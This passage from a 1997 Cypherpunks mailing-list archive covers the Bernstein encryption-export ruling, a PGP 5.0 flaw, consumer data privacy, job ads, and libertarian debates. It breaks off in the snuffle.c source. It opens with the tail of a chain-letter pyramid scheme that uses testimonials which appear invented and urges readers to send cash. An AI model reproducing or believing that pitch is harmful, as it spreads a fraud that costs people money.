that it doesn't matter where in the U.S. the people live. There simply isn't a better investment with a faster return. Mary Rockland, Lansing, MI I had recieved this program before. I deleted it, but later I wondered if I shouldn't have given it a try. Of course, I had no idea who to contact to get another copy, so I had to wait until I was e-mailed another program...11 months passed then it came...I didn't delete this one!...I made $41,000 on the first try!! D. Wilburn, Muncie, IN This is my third time to participate in this plan. We have quit our jobs, and quite soon we will buy a home on the beach and live off the interest on our money. The only way on earth that this plan will work for you is if you do it. For your sake, and for your family's sake don't pass up this golden opportunity. Remember, when you order your four reports, SEND CASH. Checks have to clear the bank and create too many delays. Good luck and happy spending! Charles Fairchild, Spokane, WA Typically when I look at a money-making deal I want to know if the company is strong, will it be here when it's time for my big pay off. In this crazy thing there is no company intervention for management to blow it. Just people like me ordering directly from the source! Interesting...I had a couple of projects I'd been trying to fund to no avail so I thought; Why not give it a try? Well 2 1/2 weeks later the orders started coming in. One project is funded and I'm sure the other will be soon! Marilynn St. Claire, Logan, UT ************************************* If this message has offended you, we apologize. To be removed from any further mailings, send a message with REMOVE in the subject line to remmee at answerme.com *************************************  From enoch at zipcon.net Tue Aug 26 11:44:56 1997 From: enoch at zipcon.net (Mike Duvos) Date: Wed, 27 Aug 1997 02:44:56 +0800 Subject: System used for DSS (US Satelite TV) In-Reply-To: <199708261802.OAA24351@homeport.org> Message-ID: <19970826183304.3978.qmail@zipcon.net> > Anyone know about the security for the DSS system? (A US satelite TV > system with 18" dishes). A buddy disconnected his for an extended > period, and on plugging it back in, got all the channels for about 5 > minutes. > So now I'm all curious if we can reproduce this. > Adam Apparently the content is not strongly encrypted in a way which requires that one be a subscriber to recover it, since there is a "test mode" which displays all the channels, including unassigned ones. I've not seen a document describing their protocols in detail, however. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From vznuri at netcom.com Tue Aug 26 12:28:37 1997 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 27 Aug 1997 03:28:37 +0800 Subject: Stewart Baker on Bernstein encryption decision (fwd) In-Reply-To: Message-ID: <199708261910.MAA04330@netcom3.netcom.com> >It cost a lot of companies a lot of money, time, and sales while >they resubmitted the same applications to the Commerce Department. well now Mr. BAKER, it has cost a lot of companies a lot of TIME and MONEY and SALES to adhere to laws that were obviously UNCONSTITUTIONAL from the very beginning, such that even the most dimwitted of citizens could tell you, but the sharpest politicians and bureacrats in our government could or would not, all erected by a government way out of control and subject to covert machinations by a massively funded/favored constituency known as the SPOOKS, under the patriotic guise of NATIONAL SECURITY. *spit* I sincerely hope that this is the first straw that breaks that fraudulent camel's back. soon let the whole corrupt structure fall like the rotten house of cards that it is. ironic indeed that you of all people would lament the "money, time, and sales" that have cost companies in the bureacratic and regulatory quagmire that is known as our government. yes, let your hastily-composed email stand as eternal testament to the fact that SOME PEOPLE JUST DON'T GET IT, even as they wallow daily in their own hypocrisy. the horrid and repulsive episode known as "cryptography regulations" is indicative that there are some people in the world who are not playing by rules of honor and integrity, even as they live under the same country, they do not have an agenda that is befitting of the welfare of the general populace, that they will exercise the greatest ingenuity in stretching their own authorities beyond that which is legitimate, in the attempt to glom as much power as can be obtained, and can be restrained from their covert machinations against their fellow man only by the shrewdest of vigilance-- something we have been deeply remiss and negligent, as a nation, in invoking. when in the course of human events it become necessary to expunge a parasite... gosh, could it really be the authority was handed to the commerce department so "the government could avoid the constitutional deficiencies of its regulations by rotating oversight of them from department to department"??? naw. ah, but that would be like impugning the impeccable motives of the tooth fair, would it not? (if so, it would be the one of the least vile and sleazy tactics employed so far in the whole sorry affair.) I am sorry that this message can barely begin to muster the sarcastic contempt I feel for you and your despicable cohorts, Mr. Baker. if you prefer a more civil message, perhaps TCM will have some consolation for you. >---------- Forwarded message ---------- >Date: Tue, 26 Aug 97 11:51:37 EST >From: Stewart Baker >To: fight-censorship-announce at vorlon.mit.edu, declan at well.com >Subject: Re: FC: John Gilmore to cypherpunks on Bernstein decision > > >Declan-- > >John is entitled to brag about the Bernstein decision, but getting the >Department of State to "RWA" all of its pending license applications is nothing >to brag about. It cost a lot of companies a lot of money, time, and sales while >they resubmitted the same applications to the Commerce Department. > >I said at the time that State's advice to crypto exporters in those last few >weeks was "Get your tongue out of my mouth, I'm kissing you good-bye." > >Perhaps the cause of this action was the lawsuit, perhaps it was spite at the >crypto exporters who lobbied for a change in jurisdiction, but whatever the >cause, it was not a good thing for anybody who is actually in the crypto >business. > >Stewart From jsmith58 at hotmail.com Tue Aug 26 12:45:37 1997 From: jsmith58 at hotmail.com (John Smith) Date: Wed, 27 Aug 1997 03:45:37 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <19970826193101.4989.qmail@hotmail.com> "William H. Geiger III" : >>You stole from me. >>*BANG* > >yep > >>You raped my sister >>*BANG* > >yep > >As is the first two cases the "criminal" has violated my property & >family. Such crimes are worthy of immediate death. You steal, you >assault >or threaten me or my family you have committed suicide. > >It is a quite simple and effective philosophy: > >"You fuck with me, my family, or my property you die. You leave me >alone >and I leave you alone." > >Even someone like you can understand such a philosophy. Well, I can't. It's very confusing. Are there judges in your philosophy, or do you just decide for yourself who to shoot? "You walked on my property." BANG. "Your music kept me awake all night." BANG. "I warned you to cut that tree down, and now it fell on my house." BANG. Or how about escalation: "You raped my daughter" "No way, she wanted it as much as I did" "That's not what she tells me. You die." BANG. "You shot my son" "Bullshit, he had it coming after what he did to my daughter." "Bullshit yourself." BANG. "You shot my pa" "He shot my son" "You're gonna die." "I'm taking you with me then." BANG. BANG. BANG. BANG. BANG. BANG. BANG. BANG. BANG. You know, there's a reason people started using judges to help settle disputes. There's a reason the common law evolved with the idea of proportionate response and restitution. This kind of shoot-everybody-I-think-harmed-me approach just doesn't work. Nobody knows what someone else will consider harm worth shooting over. If somebody disagrees that a shooting was justified, they'll shoot back, and feuds begin. The current system stinks, but your idea is no better. "John ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From alexlh at xs4all.nl Tue Aug 26 13:04:30 1997 From: alexlh at xs4all.nl (Alex Le Heux) Date: Wed, 27 Aug 1997 04:04:30 +0800 Subject: Welfare Solution #389 In-Reply-To: <34029a0f.55426630@smtp.xs4all.nl> Message-ID: <3.0.3.32.19970826220410.007e1cd0@mail.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 At 06:32 8/26/97 -0400, you wrote: [...] >>It's this attitude that creates most of the drug 'problem' for society. >>It's not the drugs. People can function fine while enjoying their hits of >>beer, weed, coke or whatever. It's the ciminalisation of some drugs and >>the attitude of people like William H. Geiger III that make the drug user >>outcasts from society. > >You are making unfounded assumptions of my position on drug use. > I see that I did. No problem, plenty of new stuff here to keep the argument going... >I really could care less about someone who uses drugs on a recreational >basis and is able to buy his drugs with his/her/its *own* money. I think >it is a total waste for those who prefer to spend their life drooling in a >corner with a needle in their arm and/or crack pipe in their hand. Even so >if they or their families are wealthy enough to support this behavior more >power to them. > >What I strongly object to is my hard earned $$$ being stolen from me to >support this behavior either in the form of taxes spent on Welfare & SS or >(for the more ambitious junkie) stolen/robbed directly. > >As a Libertarian I am all for the legalization of drugs. Our current >politicians seem incapable of learning from the past that prohibition >never works and causes more problems than it solves (Econmics 101 supply & >demand). > I suppose you believe that a drug addict has no one to blame but himself, and that he should take _all_ of the blame. I don't. They certainly deserve some credit for the mess they're in, but not entirely. Bad luck has a lot to do with it as well. Just like getting blown off a cliff by the wind. You shouldn't have been there, you should have been strong enough not be blown off, etc.... Also, it being the druggie's fault or not, treating him as an outcast is not going to solve the problem. It'll only make it worse. For him, and for the rest of us. What works much better is treating his addiction more like a disease. This is what we do in The Netherlands. We have few junkies living in the street, rarely does a granny get her head blown off for a nickle and a dime. Also the mortality rate under the junkies is very low, although I suspect you don't see that as a good thing. The 'drug problem' as it exists in most places in this world is the result of the mindboggeling numbers of people living in tiny spaces. It is a problem of us all, so the bill ends up with us all. Procecuting the addict only serves to drive up that bill. Killing him is certainly the cheap option, but a healthy society takes care of it's members, even if they mess up so spectacularly. Several programs, in The Netherlands and Switzerland and probably other places, have shown that by far the cheapest and least painful solution for all is just to give the man his drugs. In fact, Switzerland is doing just that with it's heroin addicts. As it turns out most of them get some sort of life back together, a lot even manage to get and hold jobs and thus become productive citizens dispite their addiction. >I also believe, as a Libertarian, that I have the "GOD given right" to >defend myself, my family, and my property, with deadly force if needed >(and I am the one who gets to decide when such force is needed not some >bureaucrat in DC). > Alex -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAMoqtuYAh4dUSo/EQK4agCggmF6hyfTkoR8hkEF6Lq7hPP15M0AoKC0 514gFnHTR2QkDuIXFF41S3Q1 =aK4Q -----END PGP SIGNATURE----- From rwright at adnetsol.com Tue Aug 26 13:42:30 1997 From: rwright at adnetsol.com (Ross Wright) Date: Wed, 27 Aug 1997 04:42:30 +0800 Subject: (Fwd) U.S. Judge Rules Encryption Regulations Invalid Message-ID: <199708262012.NAA04319@adnetsol.adnetsol.com> ------- Forwarded Message Follows ------- From: "Jim Broderick" To: RWright at adnetsol.com Subject: Date: Tue, 26 Aug 1997 12:38:52 PDT Tuesday August 26 9:39 AM EDT U.S. Judge Rules Encryption Regulations Invalid SAN FRANCISCO - U.S. government regulations on the export of encryption software are unconstitutional, a federal judge ruled. U.S. District Judge Marilyn Hall Patel said licensing requirements for the export of encryption software and related devices were an unconstitutional prior restraint on First Amendment free speech rights. Patel also issued a permanent injunction barring the government from enforcing the regulations against plaintiff Daniel Bernstein or anyone who sought to use, discuss or publish his encryption program. Encryption involves running a readable message though a computer program that translates the message according to an equation or algorithm into unreadable "ciphertext." "By the very terms of the encryption regulations, the most common expressive activities of scholars -- teaching a class, publishing their ideas, speaking at conferences, or writing to colleagues over the Internet -- are subject to a prior restraint by the export controls ...," Patel wrote in a 32-page ruling released in San Francisco. Patel said that, having found the regulations to be invalid, she could have issued a nationwide injunction barring their enforcement. But she said she had kept the injunction as narrow as possible pending appeal because "the legal questions at issue are novel, complex and of public importance." The ruling is important because the computer industry sees use of encryption technology across country borders as essential for advancing electronic commerce and private communications over the Internet. The government has previously cited national security concerns over the export of encryption programs. As a graduate student, Bernstein developed an encryption algorithm he called "Snuffle." In 1992, Bernstein asked the State Department whether Snuffle was controlled by export regulations then in force which classified cryptographic software as "defense articles." The government told him his program was subject to licensing by the Department of State prior to export. Alleging that he was not free to teach, publish or discuss with other scientists his theories on cryptography embodied in the Snuffle program, Berstein sued the State Department in 1995, challenging the regulations on free speech grounds. Bernstein is now a research assistant professor of mathematics, statistics and computer science at the University of Illinois at Chicago. Patel ruled last December that the old regulations limiting the export of encryption software violated the First Amendment. But late last year, President Bill Clinton issued an executive order transferring jurisdiction over the export of nonmilitary encryption products to the Commerce Department. Patel's latest ruling was on Bernstein's amended lawsuit which included the new regulations and new defendants. Patel said that her finding that encryption source code was speech protected by the First Amendment did not remove encryption technology from all government regulation. Cindy Cohn, a lawyer for Bernstein, called the ruling a "very big victory" for free speech advocates. "This brings us a step closer to people being able to freely publish ideas about encryption," she said. A U.S. Justice Department lawyer who defended the regulations could not immediately be reached for comment. The government could appeal the ruling. Copyright, Reuters Ltd. All rights reserved =-=-=-=-=-=- Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: (408) 259-2795 From rah at shipwright.com Tue Aug 26 14:17:43 1997 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 27 Aug 1997 05:17:43 +0800 Subject: Consumer privacy debate heats up Message-ID: --- begin forwarded text Resent-Date: Tue, 26 Aug 1997 15:43:17 -0400 X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO protocol To: 0xdeadbeef at substance.abuse.blackdown.org Subject: Consumer privacy debate heats up Date: Tue, 26 Aug 1997 15:39:19 -0400 From: glen mccready Resent-From: 0xdeadbeef at substance.abuse.blackdown.org X-Mailing-List: <0xdeadbeef at substance.abuse.blackdown.org> archive/latest/2153 X-Loop: 0xdeadbeef at substance.abuse.blackdown.org Precedence: list Resent-Sender: 0xdeadbeef-request at substance.abuse.blackdown.org Forwarded-by: Nev Dull Forwarded-by: chuck yerkes Forwarded-by: David HM Spector Consumer privacy debate heats up -- Chicago Tribune WASHINGTON -- An Internet entrepreneur, Ram Avrahami, says he believes he has the legal rights to his name and other personal information, such as his shopping habits, credit records and medical history. But the companies that profit from collecting personal information on Avrahami and millions of other Americans see matters differently. Since the information is collected legally and resides in their databases, they say they have reasonable claim to it. Those divergent views are colliding. While the companies stand their ground, Avrahami hopes to help start a grass-roots effort this fall to demand that the data-gatherers obtain permission before buying and selling information about an individual. More than just seeking a say in whether and how personal data is marketed, the suburban Virginia resident and his allies want to receive royalties. They wonder why only the companies should make money off the brisk commerce in their personal data. "They have to face reality," says Avrahami, 34. "They cannot sell people's names without explicit permission. It's a very simple concept." The debate is taking on new urgency as the information economy grows, and creating its own backlash, as giant America Online learned earlier this summer. AOL was compelled to beat a hasty, embarrassing retreat after users rebelled at the company's plan to sell their telephone numbers to marketers. The omnipresence of computers and the Internet have made it ever easier for businesses and government agencies to obtain, link and sell data that often reveal intimate information about millions of Americans. This has increased public anxiety about the uses such databases, which teem with information many people would be reluctant to tell even their closest friends: medical conditions revealed by tracking the pharmaceuticals purchased, mortgage borrowing obtained from real-estate records, household incomes lifted from product-warranty cards conscientiously filled out by unwitting consumers. The data-ownership question is complicated by the law's seeming ambivalence. While most states have laws forbidding the appropriation of one's name for someone else's commercial benefit, those laws have mainly been applied to celebrities, not the selling for profit of the ordinary person's name and personal information by database companies. But is that right? Not according to Anne Wells Branscomb. In her 1994 book "Who Owns Information? From Privacy to Public Access," the communications and computer lawyer, wrote: "Our names and addresses and personal transactions are valuable information assets worthy of recognition that we have property rights in them. "Unless we assert these rights, we will lose them. If such information has economic value, we should receive something of value in return for its use by others." There is clearly a developing view that agrees with her. Besides Avrahami and his allies, who say they are forming a new organization to receive, on behalf of their members, payment for the use of names or take legal action, others are challenging the data gatherers. Earlier this summer, for instance, the American Civil Liberties Union, launched its "Take Back Your Data" campaign. Besides attempting to educate Americans on the issue, the ACLU intends to push for sweeping federal legislation to re-establish individuals' control over use of their personal information. The ACLU sees this as an important personal privacy issue, especially regarding medical data. "You provide information to your health care provider solely for the purpose of treating you and making you better," said Donald Haines, a legislative counsel on privacy issues at the ACLU. "Suddenly all of these people end up acting like they have a right to your data," including law enforcement, research, insurance and public health officials. "In our view, that's nothing less than embezzlement of your data," Haines said. In Congress, Sens. Dianne Feinstein, D-Calif., and Charles Grassley, R-Iowa, are co-sponsoring a bill that would hinder the marketing of personal information by making it illegal for companies to sell Social Security numbers without first getting permission. Meanwhile, Congress also triggered a Federal Trade Commission study of database practices, such as the gathering of personal information without an individual's permission. The FTC is expected to issue its conclusions by year's end. At FTC hearings in June, John Ford, vice president for privacy and external affairs for Equifax Inc., the large consumer and business credit reporting service, summed up both sides of the argument. "Ownership of data. There's some question about people saying this is information that belongs to me, and therefore you shouldn't be using it." "Others would argue that it's ... not your information, it is information about you. So ownership becomes a kind of red herring issue for control of the data, maybe even remuneration for deciding to let your data be used," he said. In an interview, he later said his company has no official position on who owns personal information. And he repeated a warning he made at the hearings against overreaction by government regulators, saying "we ought to be working with tweezers rather than a vise grip," in dealing with whatever problems arise when database companies err. Martin Abrams, vice president for Experian Inc., formerly TRW, another large credit-reporting company, said there is ample legal basis for the companies to be able to control the information they gather. "You don't have a choice about being in a consumer data base. ... The integrity of the data base would impacted if consumers could selectively opt to be part of it or not to be part of it," he said. "At the same time, we have a long-established norm that when it comes to the marketing use of information, consumers should have the full ability to opt out of that marketing use. And responsible organizations should respect that consumer choice." Abrams added. Ford and Abrams views infuriate Bob Bulmash, president and founder of Private Citizen Inc. of Naperville, Ill., an anti-telemarketing group. Bulmash intends to join Avrahami in creating a new group called The Named that would assert its members ownership rights to their names and personal information. "Why don't we just have Mr. Ford give us his income, how many children he has ... how much he paid for his car, what's his mortgage, his Social Security number? May I sell that information? It's just information about him. That's an absurd position he's putting forward." According to Leonard Rubin, a Chicago lawyer and expert on privacy issues, the debate gets convoluted because the laws governing it are "snarled." "As far as personal data is concerned -- what toothpaste did I use this morning to brush my teeth? You don't know that. Nobody knows that," Rubin said. "But once I make that public, I have forfeited my rights to it, unless I make it public under certain conditions." And courts have tended to agree that consumers who engage in commercial transactions with companies have essentially gone public. In any event, Avrahami says he has property rights to his name under laws in many states that prevent someone from commercially benefiting by using a person's name or likeness without his permission or payment. Avrahami was the losing party in a Virginia lawsuit last year. He had sued U.S. News & World Report, accusing the publication of violating state law by selling his name to Smithsonian magazine. But the judge ruled that Avrahami hadn't proved his name had value and had hurt his case by using a variant of his name to detect who sold his personal information. Still, Avrahami is undeterred. "If someone in Illinois tries to use Michael Jordan's name for commercial benefit, Michael Jordan would be able to assert his right (to his name.) It already has been applied to celebrities. Now it just needs to be applied to common folks like you and me," he said. "There's a difference in the value but not in the right. It doesn't matter if it's $10,000 or ten cents." --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From declan at well.com Tue Aug 26 14:19:38 1997 From: declan at well.com (Declan McCullagh) Date: Wed, 27 Aug 1997 05:19:38 +0800 Subject: CYPHERPUNKS PARTY -- invite to party in DC on September 6 Message-ID: You are cordially invited to a DC cypherpunk working meeting and patent expiration party on September 6. On Saturday, September 6, the patent on the Diffie-Hellman public key cryptography system expires. Along with the Merkle-Hellman patent (which expires on October 6), this patent is key to the future of public key crypto. Now programmers can write strong encryption software without worrying about patent licensing. But the expiration of the patents doesn't guarantee the future of strong cryptography. Proposed laws could restrict its use. So the party has two portions: -- 5:30 pm: a DCCP working party and potluck supper. Topics include discussion of the patents and regulation of cryptography. Guest speakers will discuss legislation in Congress and the Bernstein case. A speaker from the administration will provide a regulator's perspective. (Please contribute to the potluck dinner!) -- 8:00 pm: a post-meeting party to celebrate the expiration of the patents. (Please bring snack foods and beverages/drinks...) To RSVP, and for directions and details, e-mail Declan at declan at well.com with DCCP-DH in your Subject: line. The party will be held in Adams Morgan in Washington, DC. -Declan From rah at shipwright.com Tue Aug 26 15:02:03 1997 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 27 Aug 1997 06:02:03 +0800 Subject: Openings for INFOSEC Analyst and Engineers Message-ID: --- begin forwarded text X-Authentication-Warning: silence.secnet.com: majordom set sender to owner-security-jobs at secnet.com using -f From: "Meryweather, Rod" To: "'security-jobs at secnet.com'" Subject: Openings for INFOSEC Analyst and Engineers Date: Mon, 25 Aug 1997 13:43:14 -0400 X-Priority: 3 MIME-Version: 1.0 Sender: owner-security-jobs at secnet.com Precedence: bulk WANG GOVERNMENT SERVICES SECURITY SERVICES POSITION OVERVIEW AND SUMMARY Organization Overview The Wang GS Security Services organization is a descendant from the Honeywell Information Systems group that has been focused on developing High Assurance computing solutions for the US Government since the late 1970's. Honeywell was the first vendor to have a system evaluated by the NSA National Computer Security Center (NCSC) against the Orange Book (a document that defines levels of trust that can be reached by operating systems) at the A1 level - the highest - in 1984. Our XTS 300 product is a direct descendent of the A1 SCOMP platform, and is currently evaluated at the B3 level of trust. The Security Services (SS) organization focuses on development and deployment of secure solutions. Product activities are contained in a group focused on the XTS 300 operating system and a trusted guard development framework product (the SAGE). The rest of the organization is focused on implementation of task-specific solutions. These currently include: DLA Security Assessment: Wang currently supports the security planning, assessment and accreditation activities with the DLA and the Defense MegaCenter in Dayton, Ohio. The DMS/DII Guard: This is a multi-year development effort that will result in a XTS 300-based X.400/X.500 guard with strong user authentication and encryption support (FORTEZZA). The State Department Guard: This is a new project that will implement a proprietary (State-compliant) XTS 300-based telegram network guard that works with identification of unclassified telegrams. The Command and Control Guard: The C2G effort involves the evolution of an existing XTS 300-based Government-owned Guard application that is deployed world-wide. The FBI: Wang currently has developed and deployed multiple IBM communications guards for the FBI, and continues to evolve and enhance the functional capabilities of these XTS 300-based systems. The IRS: This effort does not involve the XTS 300. Rather, Wang is responsible for the EDI telecommunications and security infrastructure of the IRS Tax Collection system, based on an NCR commercial Unix platform. General Technical Requirements Excellent C and Unix skills (we do not code in C++ except for the IRS project). Strong structured design and documentation skills. Linux OS on Pentium workstation. Heavy emphasis on one of the following areas: Computer Security, Unix Kernel (device drivers, printer drivers, API, OS construction), Communications (TCP/IP, X.400, X.500, SNMP), Encryption (PCMCIA or software-based), GUI development (X), Testing. MUST be clearable to TS. MUST have a BS degree or equivalent experience. MUST be a self-starter and quick learner. Competitive compensation and benefits, casual dress code, technical organization. Herndon location as of August 1, 1997. See http://www.wangfed.com/products/ssso/homepage.html for product details, http://wang.com for information about Wang. Specific Positions INFOSEC Accredidation & Risk Assessment Candidate will be a member of the DLA Security Architecture team, and will be responsible for taking a lead role in the security assessment, certification, accreditation, and post accreditation of large multifaceted LAN's/WAN's conducting EC/EDI communications on a global bases. Required 4-12 years experience with trusted system solutions and architectures. Strong back ground in National Computer Security Center "Rainbow Series" and Information Systems Security (INFOSEC) policies, procedures and documentation experience. Accreditation Support/Risk Assessment Candidate will be a member of the DMS/DII Guard Development and Deployment team, and will be responsible for taking a lead role in the assessment and justification of the assurance of the Guard architecture. Required 6-12 years experience with trusted solutions and architectures, X.400/X.500, accreditation and deployment issues. Strong documentation and communications (verbal) experience. Senior OS Developer (1) Candidate will be a member of the XTS 300 OS development staff, and should have considerable exposure (8-15 years) to the construction and enhancement of a Unix OS. Activities include API development and enhancement, device driver implementation (e.g., printer, SCSI, "console", PCMCIA devices, ethernet (802.3 + 100Mb or ATM)), application porting (e.g., X), bug fixes, and new platform porting (from one Pentium mother board to the next). Orange Book security a BIG plus. Junior OS Developer (2) Candidate will be a member of the XTS 300 OS development staff, and should be very comfortable with heavy structured C and Unix (OS construction, release building from source, etc.) Linux experience a big plus. 2-5 years experience with heavy C, Unix, and at least one of the following: GUI development, application porting on Unix, communications (TCP/IP, X.4/500, SNMP), systems installation and debug, heavy scripts, heavy testing. Orange Book security a BIG plus. XTS 300 GUI Developer Candidate will initially be assigned to the State Department Guard task, and will be responsible for the specification, design, development, implementation, testing and documentation of the man-machine interfaces for this Guard (Main-in-the-Middle review capability, dirty word list management, report generation, etc.). This will be developed with a subset of X (Motif-based). 3-5 years experience in X, C, Unix, documentation, design. All salaries are dependent on experience and are negotiable. Open Date : 8/18/97 Close Date: 1/31/98 Point of Contact: Rodney Meryweather Ph: (703) 827-3818 Sr. Security Analyst Fax: (703) 827-3161 Wang Government Services Email: Rod.Meryweather at wang.com 540 Huntmar Dr. Herndon VA. 22070 Sr. XTS Applications Developer (3) Candidate will be a member of the XTS 300 Application Development focus group, and will be responsible for a lead role in the development of Guard applications. Must have 8-15 years heavy C, Unix, Comm (TCP/IP, X.4/500), structured design, documentation, development, implementation, testing, debug and support. Orange Book Security and Guard/Firewall design a big plus. Jr. XTS Applications Developer (3) Candidate will be a member of the XTS 300 Application Development focus group, and will be responsible for a supporting role in the development of Guard applications. Must have 2-5 years heavy C, Unix, with a focus in one or more of the following: Comm (TCP/IP, X.4/500), structured design, documentation, development, implementation, testing, debug and support. Orange Book Security and Guard/Firewall design a big plus. All salaries are dependent on experience and are negotiable. Open Date : 8/18/97 Close Date: 1/31/98 Point of Contact: Rodney Meryweather Ph: (703) 827-3818 Sr. Security Analyst Fax: (703) 827-3161 Wang Government Services Email: Rod.Meryweather at wang.com 540 Huntmar Dr. Herndon VA. 22070 --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From patrick at atro.pine.nl Tue Aug 26 15:34:13 1997 From: patrick at atro.pine.nl (Patrick Oonk) Date: Wed, 27 Aug 1997 06:34:13 +0800 Subject: BoS: Bug bugs privacy file but a fix is on the way (fwd) Message-ID: <199708262220.AAA14473@atro.pine.nl> Forwarded message: >From best-of-security-request at cyber.com.au Tue Aug 26 08:30:06 1997 Resent-Date: Tue, 26 Aug 1997 16:16:35 +1000 (EST) From: darrenr at melb.convergent.com.au (Darren Reed) Message-Id: <199708260343.NAA08202 at duchess.melb.arcsystems.com.au> Date: Tue, 26 Aug 1997 13:43:37 +1000 (EST) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: darrenr at cyber.com.au Old-Status: O Resent-Message-ID: <"kYO8a.A.IkC.-PmA0"@plum> X-Loop: best-of-security at cyber.com.au Errors-To: best-of-security-request at cyber.com.au Precedence: list Resent-Sender: best-of-security-request at cyber.com.au To: best-of-security at cyber.com.au Resent-From: best-of-security at cyber.com.au X-OS: FreeBSD3.0-current X-Mailing-List: ftp://ftp.cyber.com.au/pub/archive/b-o-s/ X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request at cyber.com.au with Subject: unsubscribe Subject: BoS: Bug bugs privacy file but a fix is on the way A "flaw" in the encryption program PGP 5.0 was reported to the Australian security organisation AusCERT lat week, and a recommended fix was issued later in the week. Security consultant Paul Drake, an expatriate Australian working for a company called NetSafe, said he had discovered a bug that menat PGP 5.0 (for "Pretty Good Privacy") kept passwords in memory "at all times", as well as part of the text of whatever had been encrypted. The keyfile was also being kept in a relatively insecure file, he said. AusCERT confirmed the problem had been reported and said they were investigating. PGP advocate peter Moon, who is pushing for wider use of the software in Australia, said while the problems pointed out by Drake were "valid", they were more weak points than "bugs". "The PGP encrpytion algorithm is - as anyone knows - as solid as a rock. The attacks are all based on the principal that if you want to break into the strongest box in the world, the easiest way is to pinch thekey." He said a product called bcwipe could clear the saved information and the keyfile should probably be deleted altogether. Drake said PGP, a United States-based company, would release "PGP 5.01" without the problem. -- Jenny Sinclair, Page D4, The Age, Tuesday 26 August 1997 -- | Patrick Oonk - http://patrick.mypage.org/ - patrick at pine.nl | | PGP Key ID 0xDA2E93FA - Internic PO59 - | | Pine Internet B.V. Consultancy, installatie en beheer | | Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ | From aba at dcs.ex.ac.uk Tue Aug 26 16:07:31 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Wed, 27 Aug 1997 07:07:31 +0800 Subject: distributed virtual bank Message-ID: <199708262301.AAA01111@server.test.net> An application I have put a bit of thought into is the idea of creating a distributed banking system. That is not offline, but not a single centralised trusted bank either. Ideally it is a system where all nodes are equivalent, and k of n of those nodes have to collude before they can compromise the operation of the bank. This is related to the encrypted computation idea where I can ask you to perform a computation for me, but you won't know the operands, and I can recover the answer with a final transformation. There are a few such protocols around to compute certain functions. This would be a distributed system, the nodes in the network would be able to simulate a virtual CPU by exchanging messages and computing encrypted functions. The program you run on the virtual CPU is the bank software. One approach would be to simulate the CPU by using the exchange of encrypted communications to simulate circuit functions in the CPU. Hopefully there would be more efficient methods of performing this securely distributed computation. People would trust the bank by virtue of their belief that it would be too difficult for an attacker to compromise or acheive sufficent collusion to overcome the n of k threshold. The bank would live in the network in this virtual CPU. Individual nodes may come and go, yet the secured software entity which is the bank and it's account information would live on. Comments on how feasible it would be to design such a system with current crypto techniques? Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708262203.XAA00906@server.test.net> Ernest Hua writes: > [snip] Don't know if it's true but this ... Ern's forwarded text: > > Third, the entertainment industry giants will have to improve and > > agree on an encryption technology. The current 40-bit encryption > > standard used on DVD discs, which is supposed to stop copyright > > pirates, has already been cracked in China. 40 bit encryption obvious that can be broken... > > Stronger encryption, however, forces PCs and players to run at a > > crawl. This sounds wrong to me. Many strong ciphers run just as fast if not faster than weak ciphers. Eg 128 bit RC4 runs at the exact same speed as 40 bit RC4. IDEA & CAST are pretty fast, etc. > > Partially as a result, Fox, Paramount, and Disney have not committed > > to producing materials on DVD, Burdon noted. DVD with stupid copy protection is bad anyway. Copright police are getting too much influence. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708262215.XAA01021@server.test.net> snuffle and unsnuffle are only 64 lines each... so here they are. You need snefru also (snuffle for those not following is a construction to convert a hash function into an encryption function ... Bernstein's example is set up to use snefru ... a hash function). Hash function seem be generally exportable, though they are several constructs which allow you to convert a hash function into an encryption function, so it's not too clear why they should be exempt. Probably one reason is that hash functions are used to create and check signatures, and signature checking and making code (authentication only) also seems to be allowed for export. I expect you could come up with some creative ways of using authentication systems to provide encryption too. We've already got an MD5 and SHA1 in perl, now all we need is a nice small implementation (probably in perl) of the below which can be used for a .sig :-) So I guess you guys are now allowed to talk about snuffle implementation and it's design... any comments/reposts etc? Shall we reimplement it in perl? Adam == snuffle.c =================8<============================== #include #include "snefru.h" #define NMAX 10000 main(argc,argv) int argc; char *argv[]; { register int ch; static unsigned char x[NMAX]; register unsigned char y = 0; static unsigned char h[NMAX]; static unsigned char m[32]; static unsigned char l[64]; static unsigned char k[64]; register int n = 64; register int i; register WORD32 *wm = &m[0]; register WORD32 *wl = &l[0]; register int level = 3; SetupHash512(); for (i = 0;i < 64;i++) x[i] = k[i] = h[i] = 0; 